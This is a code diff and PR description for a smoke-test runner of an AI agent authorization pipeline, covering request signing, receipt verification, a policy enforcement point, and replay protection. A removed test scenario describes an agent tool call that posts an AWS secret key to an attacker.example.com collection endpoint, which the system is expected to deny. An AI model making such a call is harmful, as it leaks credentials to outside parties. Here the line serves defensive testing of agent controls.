+    dbg("signing preimage object", d.preimage);
+    dbg("params_hash", d.paramsHash);
+    dbg("canonical signing JSON (ensure_ascii=FALSE, sorted keys, no whitespace)", d.canonicalJson);
+    dbg("signature (base64url, safe to share)", d.signature);
+  } else {
+    request = buildProdAuthorizeRequest(action, tool, riskTier, params, nonce, config);
+  }
+} catch (e) {
+  console.log(`[2] request signing: FAIL — ${e instanceof Error ? e.message : String(e)}`);
+  process.exit(1);
+}
+console.log("[2] request signing: OK");
 
-// ═══════════════════════════════════════════════════════════════════════════
-// Scenario 3b — LOCAL REPLAY CHECK (OxDeAI PEP)
-//
-// The live ALLOW artifact from Scenario 1 is submitted to the PEP again.
-// The in-memory replay store already recorded auth_id; the PEP denies the
-// second attempt without any network call.
-// ═══════════════════════════════════════════════════════════════════════════
+// ── [3] Authorize response ────────────────────────────────────────────────────
 
-if (smokeResult) {
-  console.log("Scenario 3b — LOCAL REPLAY CHECK (OxDeAI PEP)");
-  runProdPepReplayCheck(
-    smokeResult.allowArtifact,
-    allowIntent,
-    sharedState,
-    smokeResult.signingKeyRaw,
-    prodConfig,
+const authorizeResult = await callProdAuthorize(request, config);
+if (!authorizeResult.ok) {
+  console.log(`[3] authorize response: FAIL — ${authorizeResult.error}`);
+  process.exit(1);
+}
+const rawReceipt = extractRawReceipt(authorizeResult.raw);
+if (rawReceipt === null) {
+  console.log("[3] authorize response: FAIL — could not extract receipt from response");
+  process.exit(1);
+}
+console.log("[3] authorize response: OK");
+if (DEBUG) {
+  const topLevelKeys =
+    typeof authorizeResult.raw === "object" && authorizeResult.raw !== null
+      ? Object.keys(authorizeResult.raw as Record<string, unknown>)
+      : [];
+  dbg("authorize response top-level keys", topLevelKeys);
+  dbg("extracted receipt top-level keys",
+    typeof rawReceipt === "object" && rawReceipt !== null
+      ? Object.keys(rawReceipt as Record<string, unknown>)
+      : rawReceipt,
   );
 }
 
-// ═══════════════════════════════════════════════════════════════════════════
-// Scenario 2 — PROD DENY
-//
-// Intent: HTTP POST to an attacker endpoint with credential material.
-// Sift returns a signed DENY artifact.  The live signature is verified
-// locally, then execution is blocked because decision ≠ ALLOW.
-// pepVerify is never reached — the PEP boundary is not crossed.
-// ═══════════════════════════════════════════════════════════════════════════
+// ── [4] Local receipt verification ───────────────────────────────────────────
 
-console.log("Scenario 2 — PROD DENY");
-
-const denyIntent: OxDeAIIntent = {
-  type: "EXECUTE",
-  tool: "http_post",
-  params: {
-    url: "https://attacker.example.com/collect",
-    body: "AWS_SECRET_ACCESS_KEY=AKIA...",
-  },
-};
-
-const denyResult = await prodAuthorize(
-  denyIntent, sharedState, "DENY", POLICY_DENY, prodConfig,
+const verifyKeyResult = await fetchProdVerifyKey(config);
+if (!verifyKeyResult.ok) {
+  console.log(`[4] local receipt verification: FAIL — ${verifyKeyResult.error}`);
+  process.exit(1);
+}
+dbg("verify-key response shape",
+  typeof verifyKeyResult.raw === "object" && verifyKeyResult.raw !== null
+    ? Object.keys(verifyKeyResult.raw as Record<string, unknown>)
+    : verifyKeyResult.raw,
 );
 
-if (!denyResult.ok) {
-  step(`authorize call: FAILED — ${denyResult.error}`);
-} else {
-  step("authorize call: OK");
-  step("challenge + request signing: OK");
-  step("prod JWKS/KRL verification: OK");
-  step(`auth_id:       ${denyResult.auth_id}`);
-  step(`issuer:        ${denyResult.issuer}`);
-  step(`policy:        ${denyResult.policy_id}`);
-  step(`sift decision: ${denyResult.decision}`);
-  step("pep boundary: not reached — non-ALLOW decision blocks before PEP");
+const receiptVerification = verifySiftReceipt(rawReceipt, verifyKeyResult.raw, config.tenantId);
+if (!receiptVerification.ok) {
+  console.log(`[4] local receipt verification: FAIL — ${receiptVerification.code}`);
+  dbg("local verification result", { ok: false, code: receiptVerification.code });
+  process.exit(1);
 }
-step("executed: false");
-blank();
+console.log("[4] local receipt verification: OK");
+dbg("local verification result", {
+  ok:       true,
+  decision: receiptVerification.receipt.decision,
+  nonce:    receiptVerification.receipt.nonce,
+  policy:   receiptVerification.receipt.policy_matched,
+  tenant:   receiptVerification.receipt.tenant_id,
+  agent:    receiptVerification.receipt.agent_id,
+});
+const receipt = receiptVerification.receipt;
+dbg("policy mapping", { policy_id: receipt.policy_matched, source: "policy_hash" });
 
-// ═══════════════════════════════════════════════════════════════════════════
-// Scenario 3a — PROD REPLAY (Sift-signed REPLAY decision)
-//
-// Sift issues a signed REPLAY artifact.  The signature is verified locally.
-// Execution is blocked because decision ≠ ALLOW.
-// ═══════════════════════════════════════════════════════════════════════════
+// ── [5] Authorization conversion ──────────────────────────────────────────────
 
-console.log("Scenario 3a — PROD REPLAY (Sift-signed REPLAY decision)");
+const intentResult = normalizeIntent({
+  receipt,
+  params,
+  expectedAction: action,
+  expectedTool: tool,
+});
+if (!intentResult.ok) {
+  console.log(`[5] authorization conversion: FAIL — intent normalization: ${intentResult.code}`);
+  process.exit(1);
+}
 
-const replayIntent: OxDeAIIntent = {
-  type: "EXECUTE",
-  tool: "read_file",
-  params: { path: "/etc/hostname", mode: "ro" },
-};
+const stateResult = normalizeState({
+  state: { agent: config.agentId, session_active: true },
+  requiredKeys: [],
+});
+if (!stateResult.ok) {
+  console.log(`[5] authorization conversion: FAIL — state normalization: ${stateResult.code}`);
+  process.exit(1);
+}
 
-const replayResult = await prodAuthorize(
-  replayIntent, sharedState, "REPLAY", POLICY_REPLAY, prodConfig,
+const authConvResult = receiptToAuthorization({
+  receipt,
+  intent:   intentResult.intent,
+  state:    stateResult.state,
+  issuer:   ISSUER,
+  audience: PEP_AUDIENCE,
+  keyId:    ISSUER_KEY_ID,
+});
+if (!authConvResult.ok) {
+  console.log(`[5] authorization conversion: FAIL — ${authConvResult.code}`);
+  process.exit(1);
+}
+
+const signedAuth = signAuthorization(
+  authConvResult.authorization,
+  authConvResult.signingPayload,
+  privateKeyPem,
 );
+console.log("[5] authorization conversion: OK");
+dbg("authorization payload (sig field present but elided here)", {
+  auth_id:    signedAuth.auth_id,
+  issuer:     signedAuth.issuer,
+  audience:   signedAuth.audience,
+  decision:   signedAuth.decision,
+  intent_hash:signedAuth.intent_hash,
+  state_hash: signedAuth.state_hash,
+  policy_id:  signedAuth.policy_id,
+  issued_at:  signedAuth.issued_at,
+  expires_at: signedAuth.expires_at,
+  "signature.kid": signedAuth.signature.kid,
+  "signature.alg": signedAuth.signature.alg,
+});
 
-if (!replayResult.ok) {
-  step(`authorize call: FAILED — ${replayResult.error}`);
-} else {
-  step("authorize call: OK");
-  step("challenge + request signing: OK");
-  step("prod JWKS/KRL verification: OK");
-  step(`auth_id:       ${replayResult.auth_id}`);
-  step(`issuer:        ${replayResult.issuer}`);
-  step(`policy:        ${replayResult.policy_id}`);
-  step(`sift decision: ${replayResult.decision}`);
-  step("pep boundary: not reached — non-ALLOW decision blocks before PEP");
+// ── [6] PEP decision ──────────────────────────────────────────────────────────
+
+const pep = pepVerify({
+  authorization: signedAuth,
+  intent:        intentResult.intent,
+  state:         stateResult.state,
+  audience:      PEP_AUDIENCE,
+  issuerPublicKeyRaw,
+  now:           new Date(),
+});
+console.log(`[6] pep decision: ${pep.decision}`);
+if (!pep.ok) {
+  console.log(`    reason: ${pep.reason}`);
 }
-step("executed: false");
-blank();
+dbg("pep result", pep.ok
+  ? { decision: pep.decision, executed: pep.executed, auth_id: pep.auth_id }
+  : { decision: pep.decision, executed: pep.executed, reason: pep.reason },
+);
+if (!pep.ok) {
+  process.exit(1);
+}
+
+// ── [7] Execution ─────────────────────────────────────────────────────────────
+
+console.log(`[7] execution: ${String(pep.executed)}`);
+
+// ── Replay Check — OxDeAI PEP ─────────────────────────────────────────────────
+//
+// Reuses the exact same signed artifact from the successful ALLOW above.
+// No network call — the OxDeAI PEP enforces replay protection in-process via
+// its in-memory auth_id store.  This is distinct from any Sift-side REPLAY
+// decision: Sift is not contacted here.  The PEP sees the same auth_id it
+// already recorded in step [6] and returns DENY / reason=REPLAY.
+//
+// Only runs when the initial ALLOW path fully succeeded.
+
+if (pep.ok) {
+  console.log();
+  console.log("Replay Check — OxDeAI PEP");
+
+  const pepReplay = pepVerify({
+    authorization: signedAuth,
+    intent:        intentResult.intent,
+    state:         stateResult.state,
+    audience:      PEP_AUDIENCE,
+    issuerPublicKeyRaw,
+    now:           new Date(),
+  });
+
+  console.log(`  first execution:  ALLOW / executed: true`);
+  console.log(`  second execution: ${pepReplay.decision} / reason: ${!pepReplay.ok ? pepReplay.reason : "—"} / executed: ${String(pepReplay.executed)}`);
+  dbg("replay pep result", !pepReplay.ok
+    ? { decision: pepReplay.decision, reason: pepReplay.reason, executed: pepReplay.executed }
+    : { decision: pepReplay.decision, executed: pepReplay.executed },
+  );
+  if (pepReplay.ok || pepReplay.reason !== "REPLAY" || pepReplay.executed) {
+    console.log("  replay enforcement: FAIL");
+    process.exit(1);
+  }
+  console.log("  replay enforcement: OK");
+}


### PR DESCRIPTION
…path

- implement Sift prod contract:
  - /api/v1/auth/challenge nonce flow
  - canonical JSON signing (ensure_ascii=false)
  - Ed25519 request signing (agent identity binding)
- implement Sift receipt verification:
  - canonical_payload integrity check
  - signature verification using /receipt/verify-key
  - strict fail-closed semantics
- map Sift receipt → AuthorizationV1:
  - policy_id derived from policy_hash (authoritative)
  - intent bound via canonical_request_hash
- enforce OxDeAI PEP boundary:
  - ALLOW executes once
  - replay blocked deterministically via auth_id store
- harden local secret handling:
  - ignore .local/ from version control
- add prod smoke test runner with debug mode (SIFT_PROD_DEBUG=1)

Result:
Full production path validated end-to-end:
authorize → signed receipt → local verification → adapter → PEP → execution with replay protection enforced at execution boundary